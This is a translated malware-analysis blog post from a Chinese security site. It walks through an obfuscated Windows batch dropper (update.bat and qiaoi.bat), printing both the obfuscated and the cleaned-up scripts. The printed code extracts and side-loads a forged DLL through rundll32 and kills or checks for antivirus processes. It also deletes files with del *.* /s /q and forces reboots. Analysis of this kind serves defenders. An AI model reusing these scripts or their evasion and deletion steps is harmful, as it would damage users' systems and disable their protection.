[Virus Analysis] Malware Analysis (2): Batch Scripts Gone Wild (Part 2)

    Author: i春秋 (ichunqiu) writer Sp4ce

    0x01 Recap of the previous article

    First, the file listing
    1.png

    The directory after tidying up

    2.png

    Part of the file's code before cleanup

    update.bat

    %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q 
    cls
    @echo off
    set %l%=
    set %o%=
    set %v%=
    set %e%=
    :::::::::::::khyq:::::::::::::
    del ..\..\*.pif
    :attrib ..\图片截图.exe +s +h
    copy /y 图片截图.zp ..\..\图片截图.jpg
    del config.ini
    ren config.xml config.ini
    copy /y config.ini ..\config.ini
    :::::::::::::khyq:::::::::::::
    :pdwjks
    i%l%f%l% %l%e%l%x%l%i%l%s%l%t%l% %l%"%l%%l%%temp%%l%%l%\%l%b%l%u%l%g%l%0%l%.%l%t%l%x%l%t%l%"%l% %l%(%l%g%l%o%l%t%l%o%l% %l%q%l%i%l%a%l%o%l%h%l%c%l%)%l% %l%e%l%l%l%s%l%e%l% %l%(%l%g%l%o%l%t%l%o%l% %l%c%l%j%l%m%l%%l%%l%l%l%u%l%)%l%%l%%l%%l%%l%%l%%l%%l%%l%%l%
    :cjmlu %l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%
    e%o%c%o%h%o%o%o% %o%%o%%~dp0%o%%o%%o%>%o%%o%>%o%%o%"%o%%o%%temp%%o%%o%\%o%b%o%u%o%g%o%0%o%.%o%t%o%x%o%t%o%"%o%%o%%o%%o%
    s%v%e%v%t%v%<%v%n%v%u%v%l%v%>%v%%v%%v%"%v%%v%%temp%%v%%v%\%v%b%v%u%v%g%v%0%v%.%v%t%v%x%v%t%v%"%v% %v%/%v%p%v%=%v%%v%%~dp0%v%%v%%v%
    m%e%d%e% %e%c%e%:%e%HTEMP0\%e%%e%%e%%e%
    i%e%f%e% %e%e%e%x%e%i%e%s%e%t%e% %e%%e%"%e%%e%%temp%%e%%e%\%e%q%e%r%e%.%e%t%e%m%e%p%e%"%e% %e%d%e%e%e%l%e% %e%/%e%s%e% %e%/%e%q%e% %e%"%e%%e%%temp%%e%%e%\%e%q%e%r%e%.%e%t%e%m%e%p%e%"%e%
    e%e%c%e%h%e%o%e% %e%R%e%a%e%r%e%>%e%>%e%"%e%%e%%temp%%e%%e%\%e%q%e%r%e%.%e%t%e%m%e%p%e%"%e%%e%%e%%e%%e%%e%%e%
    s%l%e%l%t%l%<%l%n%l%u%l%l%l%>%l%"%l%%l%%temp%%l%%l%\%l%q%l%r%l%.%l%t%l%m%l%p%l%"%l% %l%/%l%p%l%=%l%R%l%a%l%r%l%
    c%l%o%l%p%l%y%l% %l%/%l%b%l% %l%"%l%%l%%temp%%l%%l%\%l%q%l%r%l%.%l%t%l%m%l%p%l%"%l%+"%l%u%l%q%l%d%l%a%l%t%l%e%l%.%l%t%l%m%l%p%l%" c:HTEMP0\%l%u%l%q%l%d%l%a%l%t%l%e%l%.%l%d%l%a%l%t%l%
    c%l%o%l%p%l%y%l% %l%/%l%y%l% %l%c%l%:%l%\%l%w%l%i%l%n%l%d%l%o%l%w%l%s%l%\%l%s%l%y%l%s%l%t%l%e%l%m%l%3%l%2%l%\%l%r%l%u%l%n%l%d%l%l%l%l%l%3%l%2%l%.%l%e%l%x%l%e%l% %l%"%l%%l%%temp%%l%%l%\%l%z%l%c%l%.%l%e%l%x%l%e%l%"%l%
    c%l%o%l%p%l%y%l% %l%/%l%y%l% %l%g%l%c%l%o%l%n%l%f%l%i%l%g%l%.%l%i%l%n%l%i%l% %l%"%l%%l%%APPDATA%%l%%l%\%l%p%l%a%l%y%l%e%l%r%l%s%l%s%l%.%l%i%l%n%l%i%l%"%l%%l%%l%%l%%l%
    c%o%o%o%p%o%y%o% %o%/%o%y%o% %o%c%o%f%o%w%o%d%o%.%o%d%o%a%o%t%o% %o%%o%%o%"%o%%o%%o%%temp%%o%%o%%o%\%o%%o%%o%%o%"%o%%o%%o%%o%%o%%o%%o%
    c%o%o%o%p%o%y%o% %o%/%o%y%o% %v%u%v%p%v%d%v%a%v%t%v%e%v%j%v%.%o%t%o%m%o%p%o% %o%c%o%:%o%HTEMP0\%o%%o%%o%%o%%o%%o%%o%%o%%o%
    u%v%p%v%d%v%a%v%t%v%e%v%j%v%.%v%t%v%m%v%p%v% %o%x%o% %o%-%o%y%o% %o%-%o%o%o%+%o% %o%-%o%p%o%p%o% c:HTEMP0\%l%u%l%q%l%d%l%a%l%t%l%e%l%.%l%d%l%a%l%t%l% %o%q%o%i%o%a%o%o%o%i%o%.%o%b%o%a%o%t%o% %o%c%o%:%o%HTEMP0\%o%%o%%o%%o%
    d%o%e%o%l%o% %o%"%o%%o%%o%%o%%temp%%o%%o%%o%%o%\%o%q%o%r%o%.%o%t%o%m%o%p%o%"%o% %o%/%o%s%o% %o%/%o%q%o%%o%%o%%o%
    c%v%m%v%d%v%.%v%e%v%x%v%e%v% %v%/%v%c%v% %v%c%v%a%v%l%v%l%v% %v%c%v%:%v%HTEMP0\%v%q%v%i%v%a%v%o%v%i%v%.%v%b%v%a%v%t%v%%v%%v%
    :qiaohc %l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%
    e%l%%o%%v%%e%x%l%%o%%v%%e%i%l%%o%%v%%e%t%l%%o%%v%%e% 

    After cleanup

    cls
    @echo off
    set =
    set =
    set =
    set =
    :::::::::::::khyq:::::::::::::
    del ..\..\*.pif       //delete *.pif (here specifically 截图.pif)
    :attrib ..\图片截图.exe +s +h       //set the attributes of 截图.exe (commented out)
    copy /y 图片截图.zp ..\..\图片截图.jpg       //copy 图片截图.zp to the top directory and rename it 图片截图.jpg
    del config.ini       //delete config.ini
    ren config.xml config.ini          //rename config.xml to config.ini
    copy /y config.ini ..\config.ini       //copy config.ini to the parent directory, overwriting it
    :::::::::::::khyq:::::::::::::
    :pdwjks
    if exist "%temp%\bug0.txt" (goto qiaohc) else (goto cjmlu)     //if bug0.txt exists, jump to qiaohc, otherwise jump to cjmlu
    :cjmlu 
    echo %~dp0>>"%temp%\bug0.txt"     //write the current directory to bug0.txt
    pause
    set<nul>"%temp%\bug0.txt" /p=%~dp0     //write the current directory to bug0.txt again, without a trailing newline
    pause
    md c:\HTEMP0   //create the HTEMP0 folder
    pause
    if exist "%temp%\qr.tmp"      //existence check
    pause
    del /s /q "%temp%\qr.tmp"   //delete qr.tmp
    pause
    echo Rar>>"%temp%\qr.tmp"   //write "Rar" to qr.tmp
    pause
    set<nul>"%temp%\qr.tmp" /p=Rar  //write the string "Rar" without a trailing newline
    pause
    copy /b "%temp%\qr.tmp"+"uqdate.tmp" c:\HTEMP0\uqdate.dat //concatenate qr.tmp and uqdate.tmp into c:\HTEMP0\uqdate.dat
    pause
    copy /y c:\windows\system32\rundll32.exe "%temp%\zc.exe" //copy rundll32.exe to zc.exe
    pause
    copy /y gconfig.ini "%APPDATA%\payerss.ini" //copy gconfig.ini to payerss.ini
    pause
    copy /y cfwd.dat "%temp%\"   //copy cfwd.dat to the temp directory
    pause
    copy /y updatej.tmp c:\HTEMP0\  //copy updatej.tmp to c:\HTEMP0; this file is an archive extractor that can be run from cmd
    pause
    updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat qiaoi.bat c:\HTEMP0\  //extract uqdate.dat into the directory
    pause
    del "%temp%\qr.tmp" /s /q     //delete qr.tmp
    pause
    cmd.exe /c call c:\HTEMP0\qiaoi.bat  //run qiaoi.bat
    pause
    :qiaohc 
    exit 

    To let the files land on disk, the final line that runs qiaoi.bat was removed.
    After running it:
    Step 1: the files are copied and opened

    3.png

    Step 2: the current directory is written to bug0.txt (note the cursor position)

    4.png

    Step 3: the trailing newline is removed (note the cursor position)

    wedia.png

    Step 4: HTEMP0 is created on the C: drive
    6.png

    Step 5: qr.tmp is created under TEMP with the content Rar
    7.png

    Step 6: qr.tmp and uqdate.tmp are concatenated into c:\HTEMP0\uqdate.dat

    8.png

    Step 7: rundll32.exe is copied to zc.exe

    9.png

    Step 8: gconfig.ini is copied to payerss.ini

    10.png

    Step 9: cfwd.dat is copied to the temp directory

    11.png

    Step 10: updatej.tmp is copied to c:\HTEMP0
    12.png

    Step 11: extraction

    13.png

    0x02 This article

    The compressed contents of uqdate.dat are as follows

    14.png

    Everything could be extracted at once with the bundled tool, but to work out what the author is actually up to, we follow his path step by step.

    The original content of qiaoi.bat is as follows

    %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q 
    cls
    set %vv%=
    set %ll%=
    set %oo%=
    set %ee%=
    u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %vv%x%vv% %vv%-%vv%y%vv% %vv%-%vv%o%vv%+%vv% %vv%-%vv%p%vv%p%vv% c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% shaY0ng.exe %vv%c%vv%:%vv%HTEMP0\%vv%%vv%%vv%%vv%%vv%
    u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %ll%x%ll% %ll%-%ll%y%ll% %ll%-%ll%o%ll%+%ll% %ll%-%ll%p%ll%p%ll% c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% %ll%z%ll%c%ll%.%ll%i%ll%n%ll%f%ll% %ll%"%ll%%ll%%ll%%ll%%temp%%ll%%ll%%ll%\%ll%"%ll%
    c%oo%:%oo%HTEMP0u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %oo%x%oo% %oo%-%oo%y%oo% %oo%-%oo%o%oo%+%oo% %oo%-%oo%p%oo%p%oo% %oo%c%oo%:%oo%HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% %oo%F%oo%o%oo%rceLibrary%oo%.%oo%t%oo%m%oo%p%oo% %oo%c%oo%:%oo%HTEMP0\%oo%%oo%%oo%%oo%%oo%
    :hh %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    i%ee%f%ee% %ee%e%ee%x%ee%i%ee%s%ee%t%ee% %ee%c%ee%:%ee%HTEMP0\%ee%0%ee%.%ee%t%ee%m%ee%p%ee% %ee%d%ee%e%ee%l%ee% %ee%/%ee%s%ee% %ee%/%ee%q%ee%  %ee%c%ee%:%ee%HTEMP0\%ee%0%ee%.%ee%t%ee%m%ee%p%ee%
    S%ee%%ee%%ee%etLoc%ee%%ee%%ee%al Ena%ee%%ee%%ee%bleDe%ee%%ee%%ee%layedEx%ee%%ee%%ee%%ee%%ee%pans%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%ion
    s%ee%%ee%e%ee%%ee%t S%ee%%ee%t%ee%%ee%r=abcde%ee%%ee%f0123%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%456%ee%%ee%789
    for /l %%L in (1 1 2) do (
        set /a n = !random! %% 16
        for %%n in (!n!) do set gjOut=!gjOut!!Str:~%%n,1!
    )
    e%ll%c%ll%h%ll%o%ll% %ll%%ll%%ll%%ll%MZ!gjOut!>%ll%>%ll%c%ll%:%ll%HTEMP0\%ll%0%ll%.%ll%t%ll%m%ll%p%ll%%ll%%ll%
    set<nul>c:HTEMP0.tmp /p=MZ!gjOut!
    copy /b c:HTEMP0.tmp+c:HTEMP0ForceLibrary.tmp c:HTEMP0!gjOut!.dll
    c%ll%%ll%%ll%op%ll%%ll%%ll%y c%ll%:%ll%%ll%%ll%HTEMP0!gjOut!.d%ll%%ll%%ll%l%ll%%ll%l %ll%%ll%c%ll%%ll%:HTEMP0PotPla%ll%%ll%yer%ll%%ll%.%ll%%ll%dll
    :360 %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    ta%ll%%ll%sk%ll%%ll%%ll%list | fi%ll%%ll%nd /i "360%ll%%ll%tr%ll%%ll%ay%ll%%ll%%ll%.e%ll%%ll%%ll%x%ll%%ll%e" |%ll%%ll%%ll%| go%ll%%ll%to n%ll%%ll%%ll%d
    u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %oo%x%oo% %oo%-%oo%y%oo% %oo%-%oo%o%oo%+%oo% %oo%-%oo%p%oo%p%oo% c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% %oo%z%oo%c%oo%.%oo%l%oo%n%oo%k
    md "temp"
    md "tempgamepatch"
    copy /y "svhost.exe" "temp"
    echo [game_base]>>"tempgamepatchconfig.ini"
    echo mainExe=..zc.lnk>>"tempgamepatchconfig.ini"
    if exist "c:stemp" (goto grs) else (goto ymygj)
    :grs
    updatej.tmp x -y -o+ -pp c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    :ymygj
    tasklist | find /i "QQPCTray.exe" || goto zy360
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    :zy360
    t%ll%a%ll%s%ll%k%ll%k%ll%i%ll%l%ll%l%ll% %ll%/%ll%f%ll% %ll%/%ll%i%ll%m%ll% %ll%ksafe%ll%%ll%%ll%%ll%%ll%%ll%t%ll%%ll%%ll%%ll%ray%ll%%ll%.%ll%%ll%e%ll%%ll%x%ll%%ll%e%ll%%ll%
    ta%ll%%ll%%ll%skkil%ll%%ll%%ll%%ll%%ll%l /%ll%%ll%%ll%f /%ll%%ll%%ll%im%ll%%ll%%ll% co%ll%%ll%%ll%%ll%%ll%nim%ll%%ll%%ll%%ll%e.%ll%%ll%%ll%%ll%e%ll%x%ll%e%ll%
    c%vv%o%vv%p%vv%y%vv% %vv%/%vv%y%vv% %vv%c%vv%:%vv%\%vv%w%vv%i%vv%n%vv%d%vv%o%vv%w%vv%s%vv%\%vv%s%vv%y%vv%stem32ping%vv%.%vv%e%vv%x%vv%e%vv% "%vv%%vv%%temp%%vv%%vv%\%vv%suchost%vv%.%vv%e%vv%xe"
    d%oo%e%oo%l%oo% %oo%%oo%%temp%%oo%%oo%\%oo%l%oo%s%oo%.%oo%l%oo%o%oo%g%oo%%oo%%oo%
    
    f%oo%i%oo%n%oo%d%oo%s%oo%t%oo%r%oo% %oo%"%oo%d%oo%w%oo%x%oo%t%oo%=%oo%1%oo%"%oo% %oo%"%oo%g%oo%c%oo%o%oo%n%oo%f%oo%i%oo%g%oo%.%oo%i%oo%n%oo%i%oo%"&&goto xtdw||goto pdcq
    :xtdw %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    
    md "temps"
    md "tempsgamepatch"
    copy /y "svhost.exe" "temps"
    echo [game_base]>>"tempsgamepatchconfig.ini"
    echo mainExe=..dw.lnk>>"tempsgamepatchconfig.ini"
    
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat dw.lnk
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 8 127.0.0.1
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 1 www.baidu.com>nul 2>nul&&goto pdcq||goto dwyx
    :dwyx
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 2 127.0.0.1
    copy /y c:HTEMP0!gjOut!.dll "PotPla%ll%%ll%yer%ll%%ll%.%ll%%ll%dll"
    copy /y c:HTEMP0shaY0ng.exe "yx.exe"
    :rundll32.exe "%temp%!gjOut!.dll",TrapEntry
    
    :pdcq %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    set file=gconfig.ini
    set name=cqxt
    for /f "tokens=1,2* delims==" %%i in (%file%) do if "%%i"=="%name%" set value=%%j
    if %value%==0 (goto zcxt)else (goto xtcq)
    :xtcq %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n %value% 127.0.0.1
    if exist "user.xml" (goto bsc11) else (goto sc11)
    :sc11
    del *.* /s /q
    :bsc11
    shutdown -r -t 0
    exit
    
    :zcxt %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    if exist "update.bat" (goto yxcqbat) else (goto byxcqbat)
    :yxcqbat
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 8 127.0.0.1
    call update.bat
    :byxcqbat
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 28 127.0.0.1
    if exist "user.xml" (goto bsc12) else (goto sc12)
    :sc12
    del *.* /s /q
    :bsc12
    exit
    
    :nd %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    tasklist | find /i "QQPCTray.exe" || goto nud
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    goto kxhaha
    :nud
    t%ee%%ee%%ee%as%ee%%ee%%ee%kli%ee%%ee%%ee%st | fi%ee%%ee%%ee%nd /%ee%%ee%%ee%i "n%ee%%ee%%ee%%ee%s.e%ee%%ee%%ee%x%ee%%ee%%ee%e" |%ee%%ee%%ee%%ee%%ee%|%ee%%ee%%ee% %ee%g%ee%o%ee%to jins
    ta%ll%%ll%%ll%skkil%ll%%ll%%ll%%ll%%ll%l /%ll%%ll%%ll%f /%ll%%ll%%ll%im%ll%%ll%%ll% co%ll%%ll%%ll%%ll%%ll%nim%ll%%ll%%ll%%ll%e.%ll%%ll%%ll%%ll%e%ll%x%ll%e%ll%
    ru%ll%%ll%nd%ll%%ll%l%ll%%ll%l%ll%%ll%%ll%3%ll%2%ll%.%ll%e%ll%x%ll%e%ll% %ee%c%ee%:%ee%HTEMP0!gjOut!.d%ll%l%ll%%ll%%ll%l%ll%%ll%%ll%%ll%%ll%,TrapEntry
    e%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%xi%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%t
    :jins
    tasklist | find /i "kxetray.exe" || goto qt
    :kxhaha
    echo [Install]>>"setup.ini"
    echo CmdLine=rundll32.exe c:HTEMP0!gjOut!.dll,TrapEntry>>"setup.ini"
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat yx.exe
    :copy /y c:\windows\system32\rundll32.exe uqdate.exe
    :del "gamepatchconfig.ini"
    :echo [1]>>"gamepatchconfig.ini"
    :echo InstName=5d>>"gamepatchconfig.ini"
    :>>"gamepatchconfig.ini" echo CheckType=1
    :echo CheckPath=>>"gamepatchconfig.ini"
    :echo CheckVerion=5d>>"gamepatchconfig.ini"
    :echo InstFile=uqdate.exe>>"gamepatchconfig.ini"
    :echo InstParam=C:HTEMP0!gjOut!.dll,TrapEntry>>"gamepatchconfig.ini"
    :copy /y "svhost.exe" "yx.exe"
    exit
    :qt %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    ru%ll%%ll%nd%ll%%ll%l%ll%%ll%l%ll%%ll%%ll%3%ll%2%ll%.%ll%e%ll%x%ll%e%ll% %ee%c%ee%:%ee%HTEMP0!gjOut!.d%ll%l%ll%%ll%%ll%l%ll%%ll%%ll%%ll%%ll%,TrapEntry
    e%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%xi%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%t

    After cleanup

    cls
    set =
    set =
    set =
    set =
    updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat shaY0ng.exe c:\HTEMP0\
    updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat zc.inf "%temp%\"
    c:\HTEMP0\updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat ForceLibrary.tmp c:\HTEMP0\
    :hh 
    if exist c:\HTEMP0\0.tmp del /s /q  c:\HTEMP0\0.tmp
    SetLocal EnableDelayedExpansion
    set Str=abcdef0123456789
    for /l %%L in (1 1 2) do (
        set /a n = !random! %% 16
        for %%n in (!n!) do set gjOut=!gjOut!!Str:~%%n,1!
    )
    echo MZ!gjOut!>>c:\HTEMP0\0.tmp
    set<nul>c:\HTEMP0\0.tmp /p=MZ!gjOut!
    copy /b c:\HTEMP0\0.tmp+c:\HTEMP0\ForceLibrary.tmp c:\HTEMP0\!gjOut!.dll
    copy c:\HTEMP0\!gjOut!.dll c:\HTEMP0\PotPlayer.dll
    :360 
    tasklist | find /i "360tray.exe" || goto nd
    updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat zc.lnk
    md "temp"
    md "temp\gamepatch"
    copy /y "svhost.exe" "temp"
    echo [game_base]>>"temp\gamepatch\config.ini"
    echo mainExe=..\zc.lnk>>"temp\gamepatch\config.ini"
    if exist "c:\stemp" (goto grs) else (goto ymygj)
    :grs
    updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    :ymygj
    tasklist | find /i "QQPCTray.exe" || goto zy360
    updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    :zy360
    taskkill /f /im ksafetray.exe
    taskkill /f /im conime.exe
    copy /y c:\windows\system32\ping.exe "%temp%\suchost.exe"
    del %temp%\ls.log
    
    findstr "dwxt=1" "gconfig.ini"&&goto xtdw||goto pdcq
    :xtdw 
    md "temps"
    md "temps\gamepatch"
    copy /y "svhost.exe" "temps"
    echo [game_base]>>"temps\gamepatch\config.ini"
    echo mainExe=..\dw.lnk>>"temps\gamepatch\config.ini"
    
    updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat dw.lnk
    "%temp%\suchost.exe" -n 8 127.0.0.1
    "%temp%\suchost.exe" -n 1 www.baidu.com>nul 2>nul&&goto pdcq||goto dwyx
    :dwyx
    "%temp%\suchost.exe" -n 2 127.0.0.1
    copy /y c:\HTEMP0\!gjOut!.dll "PotPlayer.dll"
    copy /y c:\HTEMP0\shaY0ng.exe "yx.exe"
    :rundll32.exe "%temp%\!gjOut!.dll",TrapEntry
    
    :pdcq 
    set file=gconfig.ini
    set name=cqxt
    for /f "tokens=1,2* delims==" %%i in (%file%) do if "%%i"=="%name%" set value=%%j
    if %value%==0 (goto zcxt)else (goto xtcq)
    :xtcq 
    "%temp%\suchost.exe" -n %value% 127.0.0.1
    if exist "user.xml" (goto bsc11) else (goto sc11)
    :sc11
    del *.* /s /q
    :bsc11
    shutdown -r -t 0
    exit
    
    :zcxt 
    if exist "update.bat" (goto yxcqbat) else (goto byxcqbat)
    :yxcqbat
    "%temp%\suchost.exe" -n 8 127.0.0.1
    call update.bat
    :byxcqbat
    "%temp%\suchost.exe" -n 28 127.0.0.1
    if exist "user.xml" (goto bsc12) else (goto sc12)
    :sc12
    del *.* /s /q
    :bsc12
    exit
    
    :nd 
    tasklist | find /i "QQPCTray.exe" || goto nud
    updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    goto kxhaha
    :nud
    tasklist | find /i "ns.exe" || goto jins
    taskkill /f /im conime.exe
    rundll32.exe c:\HTEMP0\!gjOut!.dll,TrapEntry
    exit
    :jins
    tasklist | find /i "kxetray.exe" || goto qt
    :kxhaha
    echo [Install]>>"setup.ini"
    echo CmdLine=rundll32.exe c:\HTEMP0\!gjOut!.dll,TrapEntry>>"setup.ini"
    updatej.tmp x -y -o+ -pp c:\HTEMP0\uqdate.dat yx.exe
    :copy /y c:\windows\system32\rundll32.exe uqdate.exe
    :del "gamepatch\config.ini"
    :echo [1]>>"gamepatch\config.ini"
    :echo InstName=5d>>"gamepatch\config.ini"
